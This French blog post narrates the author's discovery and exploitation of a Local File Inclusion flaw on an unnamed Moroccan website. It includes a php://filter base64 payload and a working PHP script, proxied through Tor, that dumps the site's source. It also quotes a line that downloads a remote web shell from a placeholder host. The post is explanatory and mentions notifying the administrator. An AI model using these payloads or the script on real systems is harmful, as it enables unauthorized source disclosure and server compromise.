Je découvre une faille sur un site web marocain

Contrairement à ce qu'on peut penser, ça n'a pas été un site gouvernemental.

La blague ici étant que ces derniers sont généralement les plus vulnérables.

Je raconterai ci-dessous la façon avec laquelle je l'ai exploitée. Gardez à l'escprit que c'est juste un Proof of Concept (PoC pour les 1337 h4XX012s d'entre vous), c'est à dire que l'exploit n'a été écrit que pour prouver que c'est possible d'en écrire un, pour prouver que le site est bel et bien vulnérable, et non pas pour l'utiliser à des fins pas très gentilles. Ceci dit, je ne divulguerai pas l'URL du site web afin de protéger celui-ci. Libre à vous de croire que ce qui suivra n'est un récit fictif.

La faille

La faille en question est une faille assez répandue : la LFI - ou la Local File Inclusion. Dès que j'ai vu index.php?page= dans l'URL du site, je n'ai pas pu résister à la tentation. Sans plus tarder, j'ai donc lancé le fameux Tor Browser pour que je puisse au moins jouir d'un peu d'anonymat au cas où la situation tournerait au vinaigre.


Et ce n'en aura pas été trop.

L'URL est comme suit : http://REDACTED/index.php?page=PAGE, PAGE étant le fichier inclus. L'intérêt d'utiliser une telle méthode est qu'elle permet au codeur de ne pas avoir à réécrire du code commun entre toutes les pages du site web (appliquant ainsi le principe DRY à un certain degré) : comme l'en-tête de la page HTML, le démarrage d'une session, l'initialisation d'une connexion à la base de donnée, etc. C'est en quelque sorte un front controller rudimentaire : avec l'avenue des frameworks MVC et des microframeworks en PHP, cette approche s'est vue devenir obsolète.

Le hic c'est que lorsque cette méthode n'est pas implémentée de façon correcte, elle ouvre les portes à l'une des failles les plus létales : l'inclusion de fichiers.

Le danger d'une telle faille dépend de l'inadvertance du codeur. Au pire des cas, elle permet d'inclure des fichiers distants, permettant ainsi aux méchants de facilement exécuter du code PHP sur le serveur de la victime. Le code inclus est de façon générale un simple script qui permettra de télécharger un shell plus sophistiqué :

exec('curl -o 404.php http://wwww.mechant.org/shell.php')

Mais heureusement pour vous, cher développeur, et malheureusement pour le pirate, il est difficile de trouver un site PHP tellement mal configuré qu'il lui permettrait d'inclure des fichiers distants. La directive de configuration "allow_url_include" du fichier php.ini est désactivée par défaut, l'empêchant ainsi de parvenir à ses fins.

*Mais alors, puisque cette directive-machin est désactivée, le site est sécurisé non ?*

Hmm.. pas tout à fait. Il se peut qu'il soit toujours possible d'inclure des fichiers locaux, c'est à dire ceux déjà présents sur le serveur. La procédure générale consiste à trouver l'error_log, ou l'access_log, et d'effectuer ce qui s'appelle le "log poisoning" : causer une erreur qui s'écrit dans l'error_log, puis inclure celui-ci, exécutant ainsi le code qu'on aura préalablement glissé dans l'erreur. Ceci dit, c'est quelque chose qui est plus facile à dire qu'à faire. Déjà qu'il faudra trouver l'emplacement de ces logs, puis on devra espérer que notre code malicieux ne se prenne pas un urlencode dans sa face, le rendant ainsi aussi inoffensif qu'un ours en peluche.

.. ou pas
De plus, il se peut que le code vulnérable ajoute automatiquement une extension au fichier inclus, obligeant ainsi le pirate à utiliser le null-byte, chose qui a de fortes chances à échouer. Mais là je commence à dérailler.

Ce fut effectivement le cas du site web en question. Le code vulnérable peut se résumer à ces quelques lignes :

if(isset($_GET['page']))
{
    include $_GET['page'] . '.php';
}
else
{
    include 'home.php';
}

Quelques tests ont rapidement révélé qu'il était impossible d'inclure des fichiers distants, ni de faire du log poisonning. Et là je me souviens d'une méthode lue il y a quelques années sur un certain blog : les wrappers !

Les rappeurs ?

Si vous êtes un développeur PHP, vous avez probablement déjà utilisé les rappeurs quelque part dans votre code. En voici des exemples :

$json = file_get_contents('http://www.site.com/api.json');
$handle = fopen('ftp://user:password@host.com/fichier.ext');

Les wrappers sont ce qui permet aux fonctions de la famille de fopen d'être aussi polyvalentes et d'ainsi pouvoir piocher soit dans un serveur FTP, HTTP, ou autre. Il est aussi possible d'en écrire vous même ! C'est une des "hidden features" de PHP : bien qu'elle existe, elle n'est pas souvent utilisée.

Ce qui nous intéresse là, c'est le wrapper php://, ou plus précisément php://filter, qui nous permet d'appliquer toutes sortes de filtres à un stream le moment de son ouverture. D'habitude, le code inclus s'exécute, et seul le résultat est affiché. Pour forcer l'affichage dudit code, on devra donc le convertir en un format qui puisse être affiché, un qui soit dépourvu de code PHP. La façon la plus facile de faire ceci est de l'encoder en base64, puis le décoder une fois affiché pour obtenir la source du fichier tel qu'il est sur le serveur. Et c'est ce que j'ai fait :

http://REDACTED/index.php?page=php://filter/read=convert.base64-encode/resource=index

Et voilà ! Pour outrepasser l'ajout forcé de l'extension .php au code, je l'ai omise du le paramètre "resource". En remplaçant $_GET['page'] par sa valeur, la ligne include s'évalue comme tel :

include 'php://filter/read=convert.base64-encode/resource=index' . '.php';

Pour automatiser le tout, j'ai écrit un petit script PHP d'une soixantaine de lignes que voici :

if($argc < 2)
{
	printf("Usage : php %s page\n", $argv[0]);
	exit;
}
$path = $argv[1];
if(strpos($path, '/') !== false)
{
	$dir = dirname($path);
	$file = basename($path);
	if(!file_exists($dir) && !mkdir($dir))
	{
		echo 'Failed to create the directory : ' . $dir . PHP_EOL;
		exit;
	}
}

$url = 'http://REDACTED/index.php?page=php://filter/read=convert.base64-encode/resource=' . $argv[1];
$query = '//[REDACTED]';
$ch = curl_init();

curl_setopt_array($ch, [
	CURLOPT_URL => $url,
	CURLOPT_PROXY => '127.0.0.1:9150',
	CURLOPT_PROXYTYPE => 7,
	CURLOPT_RETURNTRANSFER => true,
	CURLOPT_FOLLOWLOCATION => true
]);

echo 'Retrieving the source...' . PHP_EOL;
$html = curl_exec($ch);
if($html === false)
{
	echo 'xPloit failed : cURL error.' . PHP_EOL;
	echo curl_error($ch);
	exit;
}

echo 'Parsing the data...' . PHP_EOL;
libxml_use_internal_errors(true);
$dom = new DOMDocument;
$dom->recover = true;
$dom->strictErrorChecking = false;
$dom->loadHTML($html);
libxml_clear_errors();
$xpath = new DOMXPath($dom);
try
{
	$encoded = $xpath->query($query)->item(0)->nodeValue;
}
catch(Exception $e)
{
	echo 'xPloit failed : XPath error.' . PHP_EOL;
	echo $e->getMessage();
	exit;
}

echo 'Writing the data...' . PHP_EOL;
file_put_contents($path . '.php', base64_decode($encoded));
echo 'Done !' . PHP_EOL;

Ce dernier supporte les pages web imbriquées et crée une arborescence similaire en local. Ainsi, il fonctionnera par exemple tout aussi bien pour "index" que pour "dossier/index".

Le script crée d'abord le dossier, si nécessaire, puis télécharge la page faillible, pour ensuite en extraire le code en base64, décoder celui-ci et écrire le résultat dans un fichier local du même nom. Le téléchargement s'effectue par la très célèbre librarie libcurl, et le parsage se fait quant à lui par DOMDocument et DOMXPath. Ce sont des librairies robustes que j'utilise tout le temps pour faire du scraping, du coup elles se sont avérées très utiles pour écrire l'exploit.

Vous remarquerez que j'ai configuré cURL de façon à ce que le trafic passe par un proxy. En réalité, je ne suis pas sur que ça fonctionne. Le proxy utilisé n'est autre que Tor, qui a été lancé par le Tor Browser. J'ai testé l'adresse IP avec un simple script PHP et elle a effectivement changé, mais je garde mes doutes là dessus.

Conclusion

Pour finir j'ai contacté l'administrateur du site web pour lui faire part de mes découvertes, ainsi que de la façon par laquelle le problème peut être résolu (prédéfinir un tableau de pages permises et vérifier qu'il contient bien $_GET['page']). J'ai bien entendu créé une adresse email rien que pour ceci. J'ai aussi écrit l'email en anglais histoire qu'on me prenne pour un américain. Connaissant les marocains (parce que j'en suis un quoi), on a tendance à faire confiance à leur savoir car "ce sont des gens qui sont déjà arrivés", comme on dit chez nous.

Toutefois, connaissant la façon de penser des marocains, j'imagine que dans la pire des situations, voilà ce qui arrivera :

  • le webmaster reçoit mon email et clique sur le lien qui expose la faille
  • il contacte le(s) développeur(s) pour lui/leur reprocher le travail bâclé qu'ils ont fait
  • le développeur lui dit que c'était un hameçon, que le fait d'avoir cliqué sur le lien aura donné au pirate (moi) l'accès au site, et offre de "réparer les dégâts" contre une certaine somme d'argent, frappant deux oiseaux d'un seul coup
  • à chaque fois qu'un problème surgira, le pirate sera blâmé.

Mais là c'est vraiment le pire des pires des cas.

Pour finir ce billet, je dirai que la façon dont j'ai exploité cette faille est générique et ennuyeuse. Même si un exploit n'aboutit pas, le pirate ferait preuve de créativité pour parvenir à ses fins, cherchant d'autres vecteurs d'attaque, combinant plusieurs failles, usant d'ingénierie sociale, les possibilités sont infinies. Je me rappelle avoir lu le récit d'un hacker qui est parvenu à exploiter une LFI, et ce en envoyant un email bien forgé et en incluant /var/log/maillog ! La véracité de cette histoire reste à confirmer, mais j'ai bien aimé la méthode.

Bref, les hackers font preuve de beaucoup d'ingéniosité pour casser la sécurité d'une application, et leurs récits n'en sont que plus fascinants.

Commentaires

Enregistrer un commentaire

Posts les plus consultés de ce blog

Writing a fast(er) youtube downloader

Image
As a millenial, I never managed to embrace the streaming culture that's so prevalent nowadays. Having grown up in an era where being offline was the norm, I developed an unhealthy habit of just-in-case data hoarding that I can't seem to shake off. When youtube-dl suddenly started complaining about an "uploader id" error , I decided to take things into my own hands. Understanding the streaming process The recon step consisted of inspecting the HTTP traffic to see what I could find. Sure enough, the network tab showed some interesting requests when filtering by "medias": Opening one of these in a new tab shows a MIME type error. The browser can't play it for some reason and neither could mpv. I downloaded it and ran the file command on it, but it shows up as a data blob: $ file videoplayback.mp4 videoplayback.mp4: data I suspected that there was some encryption going on and that maybe the Youtube video player knows how to decrypt this file. B
Lire la suite

My experience with Win by Inwi

Image
In my previous post, I mentioned how I was using a data plan that amounts to 10 DH per gigabyte. Being a relatively light streamer, I can usually get by with 10 gigabytes per month. These days however, I often find myself abusing my data plan for calls and screen sharing and whatnot. This month for example, I spent 250 DH on internet alone. With a monthly spending like that, I realized that I might as well get ADSL or a cheap optical fiber subscription. So why didn't I ? Well, for one, I don't want to get tied down by a monthly subscription. Secondly, I don't want something that requires a heavy installation with all the fees and the time that it implies. And finally, I want to have the option of carrying it with me wherever I want. When I was searching for alternatives, a friend of mine suggested Win by Inwi . I looked into it and it seemed to satisfy my needs of portability and ease of use. In short, you can customize your plan as you wish , handle the paperwork onlin
Lire la suite

Porting a Golang and Rust CLI tool to D

Image
A few days ago, in the programming subreddit, Paulo Henrique Cuchi shared his experience writing a command line tool in both Rust and Go . The tool in question is a client for his side project, Hashtrack. Hashtrack exposes a GraphQL API with which the clients can track certain twitter hashtags and get a real time list of relevant tweets. Prompted by this comment , I decided to write a D port to demonstrate how D can be used to achieve a similar goal. I'll try to keep the same structure as the one he used in his blog post. Source code on Github How did I end up using D? The main reason is that the original blog post compared statically typed languages like Go and Rust, and made honorable mentions to Nim and Crystal, but didn't mention D. D falls under this category, so I think this will make for an interesting comparison I also like D as a language and I have mentioned it in various other blog posts. Local environment The manual has a lengthy page on how to downlo
Lire la suite